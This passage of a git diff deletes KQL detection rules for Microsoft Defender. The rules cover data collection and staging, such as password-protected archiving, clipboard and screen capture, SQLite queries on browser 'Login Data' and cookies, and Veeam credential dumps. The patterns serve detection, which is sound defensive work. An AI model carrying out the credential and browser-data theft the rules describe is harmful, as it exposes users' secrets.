delete mode 100644 Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_DismHost.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_EventVwr.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql delete mode 100644 Privilege 
Escalation/UAC_Bypass_Via_Wsreset.kql
delete mode 100644 Privilege Escalation/UAC_Bypass_WSReset.kql
delete mode 100644 Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql
delete mode 100644 Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql
delete mode 100644 Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql
delete mode 100644 Privilege Escalation/UAC_Bypass_via_Sdclt.kql
delete mode 100644 Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql
delete mode 100644 Privilege Escalation/UAC_Disabled.kql
delete mode 100644 Privilege Escalation/UAC_Notification_Disabled.kql
delete mode 100644 Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql
delete mode 100644 Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
delete mode 100644 Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
delete mode 100644 Privilege Escalation/VsCode_Powershell_Profile_Modification.kql
delete mode 100644 Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
delete mode 100644 Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql
delete mode 100644 Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql
delete mode 100644 Privilege Escalation/Windows_Kernel_Debugger_Execution.kql
delete mode 100644 Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql
create mode 100644 helper.py
create mode 100644 requirements.txt
diff --git a/Collection/7Zip_Compressing_Dump_Files.kql b/Collection/7Zip_Compressing_Dump_Files.kql
deleted file mode 100644
index daeee759..00000000
--- a/Collection/7Zip_Compressing_Dump_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/27
-// Level: medium
-// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe")))
\ No newline at end of file
diff --git a/Collection/Audio_Capture_via_PowerShell.kql b/Collection/Audio_Capture_via_PowerShell.kql
deleted file mode 100644
index b1de4d13..00000000
--- a/Collection/Audio_Capture_via_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects audio capture via PowerShell Cmdlet.
-// Tags: attack.collection, attack.t1123
-DeviceProcessEvents
-| where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice "
\ No newline at end of file
diff --git a/Collection/Audio_Capture_via_SoundRecorder.kql b/Collection/Audio_Capture_via_SoundRecorder.kql
deleted file mode 100644
index 5dcbdbbf..00000000
--- a/Collection/Audio_Capture_via_SoundRecorder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: medium
-// Description: Detect attacker collecting audio via SoundRecorder application.
-// Tags: attack.collection, attack.t1123
-DeviceProcessEvents
-| where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe"
\ No newline at end of file
diff --git a/Collection/Automated_Collection_Command_Prompt.kql b/Collection/Automated_Collection_Command_Prompt.kql
deleted file mode 100644
index 9f680167..00000000
--- a/Collection/Automated_Collection_Command_Prompt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/28
-// Level: medium
-// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
-// Tags: attack.collection, attack.t1119, attack.credential_access, attack.t1552.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xlsx" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".pptx" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".txt") and ((ProcessCommandLine contains "dir " and ProcessCommandLine contains " /b " and ProcessCommandLine contains " /s ") or ((ProcessCommandLine contains " /e " or ProcessCommandLine contains " /si ") and ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql b/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql
deleted file mode 100644
index b639138c..00000000
--- a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_7-ZIP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/27
-// Level: medium
-// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " a " or ProcessCommandLine contains " u ") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and ProcessCommandLine contains " -p"
\ No newline at end of file
diff --git a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql b/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql
deleted file mode 100644
index 70970441..00000000
--- a/Collection/Compress_Data_and_Lock_With_Password_for_Exfiltration_With_WINZIP.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/27
-// Level: medium
-// Description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -min " or ProcessCommandLine contains " -a ") and ProcessCommandLine contains "-s\"" and (ProcessCommandLine contains "winzip.exe" or ProcessCommandLine contains "winzip64.exe")
\ No newline at end of file
diff --git a/Collection/Compressed_File_Creation_Via_Tar.EXE.kql b/Collection/Compressed_File_Creation_Via_Tar.EXE.kql
deleted file mode 100644
index c32def88..00000000
--- a/Collection/Compressed_File_Creation_Via_Tar.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3
-// Date: 2023/12/19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to create a compressed file.
-Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
-
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql b/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql
deleted file mode 100644
index f02eb771..00000000
--- a/Collection/Compressed_File_Extraction_Via_Tar.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: AdmU3
-// Date: 2023/12/19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to extract compressed file.
-Adversaries may abuse various utilities in order to decompress data to avoid detection.
-
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
deleted file mode 100644
index 2846d8ff..00000000
--- a/Collection/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
-// Date: 2019/12/30
-// Level: medium
-// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
-// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))))
\ No newline at end of file
diff --git a/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql b/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql
deleted file mode 100644
index 0fb4879a..00000000
--- a/Collection/CredUI.DLL_Loaded_By_Uncommon_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/20
-// Level: medium
-// Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceImageLoadEvents
-| where ((FolderPath endswith "\\credui.dll" or FolderPath endswith "\\wincredui.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("credui.dll", "wincredui.dll"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe", "C:\\Windows\\regedit.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath startswith "C:\\Users\\") or InitiatingProcessFolderPath endswith "\\opera_autoupdate.exe" or (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Teams\\" and InitiatingProcessFolderPath endswith "\\Teams.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql b/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql
deleted file mode 100644
index 11c993e5..00000000
--- a/Collection/Data_Copied_To_Clipboard_Via_Clip.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/27
-// Level: low
-// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-// Tags: attack.collection, attack.t1115
-DeviceProcessEvents
-| where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe"
\ No newline at end of file
diff --git a/Collection/Esentutl_Steals_Browser_Information.kql b/Collection/Esentutl_Steals_Browser_Information.kql
deleted file mode 100644
index 11258b4a..00000000
--- a/Collection/Esentutl_Steals_Browser_Information.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: medium
-// Description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
-// Tags: attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-r" or ProcessCommandLine contains "/r") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "esentutl.exe") and ProcessCommandLine contains "\\Windows\\WebCache"
\ No newline at end of file
diff --git a/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql b/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql
deleted file mode 100644
index 32eb0763..00000000
--- a/Collection/Exchange_PowerShell_Snap-Ins_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/03/03
-// Level: high
-// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
-// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe")))
\ No newline at end of file
diff --git a/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql b/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql
deleted file mode 100644
index 892b79db..00000000
--- a/Collection/Files_Added_To_An_Archive_Using_Rar.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, E.M. Anhaus, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Detects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " a " and FolderPath endswith "\\rar.exe"
\ No newline at end of file
diff --git a/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql b/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql
deleted file mode 100644
index b13cc722..00000000
--- a/Collection/Folder_Compress_To_Potentially_Suspicious_Output_Via_Compress-Archive_Cmdlet.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2021/07/20
-// Level: medium
-// Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.
-An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
-
-// Tags: attack.collection, attack.t1074.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath $env:TEMP") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "Compress-Archive -Path" and ProcessCommandLine contains "-DestinationPath" and ProcessCommandLine contains ":\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Collection/PUA_-_Mouse_Lock_Execution.kql b/Collection/PUA_-_Mouse_Lock_Execution.kql
deleted file mode 100644
index cad3d884..00000000
--- a/Collection/PUA_-_Mouse_Lock_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Cian Heasley
-// Date: 2020/08/13
-// Level: medium
-// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
-// Tags: attack.credential_access, attack.collection, attack.t1056.002
-DeviceProcessEvents
-| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_"
\ No newline at end of file
diff --git a/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql b/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql
deleted file mode 100644
index 7a27616d..00000000
--- a/Collection/Password_Protected_Compressed_File_Extraction_Via_7Zip.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/10
-// Level: medium
-// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o")
\ No newline at end of file
diff --git a/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql b/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql
deleted file mode 100644
index 754c2e8e..00000000
--- a/Collection/PowerShell_Get-Clipboard_Cmdlet_Via_CLI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
-// Tags: attack.collection, attack.t1115
-DeviceProcessEvents
-| where ProcessCommandLine contains "Get-Clipboard"
\ No newline at end of file
diff --git a/Collection/Rar_Usage_with_Password_and_Compression_Level.kql b/Collection/Rar_Usage_with_Password_and_Compression_Level.kql
deleted file mode 100644
index eb0b2acf..00000000
--- a/Collection/Rar_Usage_with_Password_and_Compression_Level.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @ROxPinTeddy
-// Date: 2020/05/12
-// Level: high
-// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ")
\ No newline at end of file
diff --git a/Collection/Recon_Information_for_Export_with_Command_Prompt.kql b/Collection/Recon_Information_for_Export_with_Command_Prompt.kql
deleted file mode 100644
index 63bb9dd0..00000000
--- a/Collection/Recon_Information_for_Export_with_Command_Prompt.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/30
-// Level: medium
-// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
-// Tags: attack.collection, attack.t1119
-DeviceProcessEvents
-| where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\")
\ No newline at end of file
diff --git a/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
deleted file mode 100644
index 6b0bdff3..00000000
--- a/Collection/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
-// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592
-DeviceProcessEvents
-| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql b/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql
deleted file mode 100644
index 630b3df1..00000000
--- a/Collection/SQLite_Chromium_Profile_Data_DB_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: TropChaud
-// Date: 2022/12/19
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql b/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql
deleted file mode 100644
index fbc2f1fc..00000000
--- a/Collection/SQLite_Firefox_Profile_Data_DB_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/08
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
-// Tags: attack.credential_access, attack.t1539, attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql b/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql
deleted file mode 100644
index c38fcb0e..00000000
--- a/Collection/Screen_Capture_Activity_Via_Psr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2019/10/12
-// Level: medium
-// Description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
-// Tags: attack.collection, attack.t1113
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/start" or ProcessCommandLine contains "-start") and FolderPath endswith "\\Psr.exe"
\ No newline at end of file
diff --git a/Collection/Suspicious_Camera_and_Microphone_Access.kql b/Collection/Suspicious_Camera_and_Microphone_Access.kql
deleted file mode 100644
index 02e3f749..00000000
--- a/Collection/Suspicious_Camera_and_Microphone_Access.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Den Iuzvyk
-// Date: 2020/06/07
-// Level: high
-// Description: Detects Processes accessing the camera and microphone from suspicious folder
-// Tags: attack.collection, attack.t1125, attack.t1123
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#")
\ No newline at end of file
diff --git a/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql b/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql
deleted file mode 100644
index 89728d30..00000000
--- a/Collection/Suspicious_Manipulation_Of_Default_Accounts_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/01
-// Level: high
-// Description: Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc
-// Tags: attack.collection, attack.t1560.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ProcessCommandLine contains " user " and (ProcessCommandLine contains " Järjestelmänvalvoja " or ProcessCommandLine contains " Rendszergazda " or ProcessCommandLine contains " Администратор " or ProcessCommandLine contains " Administrateur " or ProcessCommandLine contains " Administrador " or ProcessCommandLine contains " Administratör " or ProcessCommandLine contains " Administrator " or ProcessCommandLine contains " guest " or ProcessCommandLine contains " DefaultAccount " or ProcessCommandLine contains " \"Järjestelmänvalvoja\" " or ProcessCommandLine contains " \"Rendszergazda\" " or ProcessCommandLine contains " \"Администратор\" " or ProcessCommandLine contains " \"Administrateur\" " or ProcessCommandLine contains " \"Administrador\" " or ProcessCommandLine contains " \"Administratör\" " or ProcessCommandLine contains " \"Administrator\" " or ProcessCommandLine contains " \"guest\" " or ProcessCommandLine contains " \"DefaultAccount\" " or ProcessCommandLine contains " 'Järjestelmänvalvoja' " or ProcessCommandLine contains " 'Rendszergazda' " or ProcessCommandLine contains " 'Администратор' " or ProcessCommandLine contains " 'Administrateur' " or ProcessCommandLine contains " 'Administrador' " or ProcessCommandLine contains " 'Administratör' " or ProcessCommandLine contains " 'Administrator' " or ProcessCommandLine contains " 'guest' " or ProcessCommandLine contains " 'DefaultAccount' ")) and (not((ProcessCommandLine contains "guest" and ProcessCommandLine contains "/active no")))
\ No newline at end of file
diff --git a/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql b/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql
deleted file mode 100644
index 4a238404..00000000
--- a/Collection/VeeamBackup_Database_Credentials_Dump_Via_Sqlcmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/20
-// Level: high
-// Description: Detects dump of credentials in VeeamBackup dbo
-// Tags: attack.collection, attack.t1005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SELECT" and ProcessCommandLine contains "TOP" and ProcessCommandLine contains "[VeeamBackup].[dbo].[Credentials]") and FolderPath endswith "\\sqlcmd.exe"
\ No newline at end of file
diff --git a/Collection/Veeam_Backup_Database_Suspicious_Query.kql b/Collection/Veeam_Backup_Database_Suspicious_Query.kql
deleted file mode 100644
index f4765f5e..00000000
--- a/Collection/Veeam_Backup_Database_Suspicious_Query.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: medium
-// Description: Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
-// Tags: attack.collection, attack.t1005
-DeviceProcessEvents
